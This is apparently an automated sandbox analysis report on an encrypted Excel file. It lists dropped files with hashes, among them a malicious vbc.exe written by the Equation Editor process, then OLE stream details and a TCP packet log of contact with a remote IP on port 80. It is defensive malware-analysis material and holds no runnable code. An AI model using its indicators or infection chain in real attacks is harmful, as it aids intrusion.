SHA-256:	BE7D5C9CC490CFC8FEAD865FDD5AEE3A2025A4815387E649BC40F167B9B65143
SHA-512:	ACF3EB53C093B0941DE217D45F84059B45CE0B4665CF58E2DE999126BDE6E67256D3EAEBA0CF7DBF472455875E91A0853ACF600153271C99EBE388B92ADDFB1D
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................&.(.&.......&...&..N.S..&...&.......&.p.&..N.S..&...&. ....yJR..&...&. .........E..zJR............................................X...%...7...................{ .@................C.a.l.i.b.r...............&.X.....&...&..2CR..........&...&..{AR......&...E.dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Temp\Cab5D20.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\Tar5D21.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	modified
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\Desktop\~$0AX4532QWSA.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	812032
Entropy (8bit):	7.920094533275065
Encrypted:	false
SSDEEP:	12288:yvNFVgCBX3xTqRv2RVozqB6Gnw3OvLS19TTPshs+nEQqkmyaIIQFq:MFVR352+DQSRW193sTnEdPy3
MD5:	72B76DB11728DD92AA4C3CB45F155B05
SHA1:	743E9F3600FD98E8F73F0E61DF6EDB1571BD4523
SHA-256:	469EF5404A9F75003F9A50A94BFBBBC339F1F649275FEE87C102F72D4F97443E
SHA-512:	705A3ED3401AF991B0548164B2C5D66A28B86CE57F11685C71A6B47935EC79DB53056E9EDFC8E3458CC7B6168D8452B4AFC918E5AF8051942DC5068F08E9A7C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..Z...........y... ........@.. ....................................@.................................<y..O................................... y............................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................py......H...........\.......K...@K...-...........................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....".(.......0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.995653517983219
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	0AX4532QWSA.xlsx
File size:	1385984
MD5:	9b4eeaed62b4b0253a7a3205f771099d
SHA1:	e7340dd8904b13bf4dbf842c56479ffdb969287c
SHA256:	9bbe5843787cdc023cff31aaa88ce4b91e52e013d5e4b543323b7eea2f5f51d3
SHA512:	14f539709d5a6a0312bae5a236326812b5bbf9af34b555764c937a3095bd14e689c04f5d95e94b2a118eca42173295cec92779f6688a6e4e8d6b4a49e0deff0e
SSDEEP:	24576:GrwrM4dAXCdbZPU5nubYizvfUnlNgRZ0ad9OC1jnvOarfUBapjOaIO:ywo4CU85nubYiznUlNgv0nC1jPcBQjIO
File Content Preview:	........................>...............................................................................................z.......\|.......~...............z.......\|..............................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "0AX4532QWSA.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1370920

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1370920
Entropy:	7.99986275596
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . U e 1 _ . . . . Y . X . P a . . . . V . . H . . . K t p . . . . . . . . * . . . g P . . . . . . ] H A C . . . 3 7 " . . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . * . . F . . 4 . . v P . . + . . *
Data Raw:	1a eb 14 00 00 00 00 00 d5 9a ff 55 65 31 5f d1 86 0d 1d 59 b6 58 db 50 61 b3 db e4 90 56 13 92 48 ad a7 b1 4b 74 70 80 da fd d0 f4 1f d7 a4 2a a0 8b a3 67 50 c8 9c c0 04 f4 0f 5d 48 41 43 d3 d3 bf 33 37 22 c2 f5 e0 76 50 be b8 2b ed aa 2a 89 9d 46 93 d5 34 8e 9e 76 50 be b8 2b ed aa 2a 89 9d 46 93 d5 34 8e 9e 76 50 be b8 2b ed aa 2a 89 9d 46 93 d5 34 8e 9e 76 50 be b8 2b ed aa 2a

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.58057080349
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . m . . . . H . Z E T : . . . . < . . . . . 2 3 . . ~ $ D . . . . . . . . j P . . U 9 . . . . . 2 . u . . . . 8 . . . . 2 . . . !
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 20:42:44.748771906 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:44.914962053 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:44.915137053 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:44.916251898 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084038019 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084103107 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084141016 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084191084 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084212065 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084249973 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084259987 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084270000 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084291935 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084295034 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084332943 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084373951 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084403992 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084434032 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.084542990 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.084578991 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.093185902 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250488997 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250545025 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250574112 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250605106 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250633001 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250669956 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250705957 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250751019 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250793934 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250830889 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250847101 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250868082 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250893116 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250899076 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250902891 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250906944 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250907898 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250912905 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250945091 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.250971079 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.250983000 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251005888 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251020908 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251041889 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251068115 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251069069 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251112938 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251128912 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251149893 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251171112 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251189947 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251204967 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251228094 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.251249075 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.251270056 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.253437042 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417339087 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417431116 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417471886 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417495966 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417512894 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417532921 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417538881 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417562962 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417577982 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417609930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417634964 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417649031 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417687893 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417696953 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417728901 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417738914 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417756081 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417778015 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417795897 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417820930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417829037 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417860031 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417872906 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417898893 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417912006 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417937040 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417974949 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.417984962 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.417996883 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418020964 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418024063 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418067932 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418082952 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418106079 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418121099 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418147087 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418160915 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418185949 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418200970 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418221951 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418237925 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418262005 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418277979 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418302059 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418318987 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418353081 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418353081 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418395996 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418412924 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418435097 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418458939 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418474913 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418484926 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418514967 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418529987 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418554068 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418567896 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418592930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418606997 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418632030 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418648005 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418679953 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418684006 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418723106 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418734074 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418761969 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418776035 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418806076 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418819904 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418845892 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.418859959 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.418915987 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.419260979 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.419301033 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.419342041 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.419343948 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.419352055 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.419378996 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.419397116 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.419475079 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.419943094 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.584923983 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.584950924 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.584961891 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.584973097 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.584985971 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.584996939 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585007906 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585019112 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585030079 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585045099 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585056067 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585067034 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585083961 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585095882 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585105896 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585118055 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585376978 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.585803032 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585820913 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585836887 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585896969 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585911036 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.585911989 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585930109 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585944891 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585951090 CET	49167	80	192.168.2.22	191.96.149.225
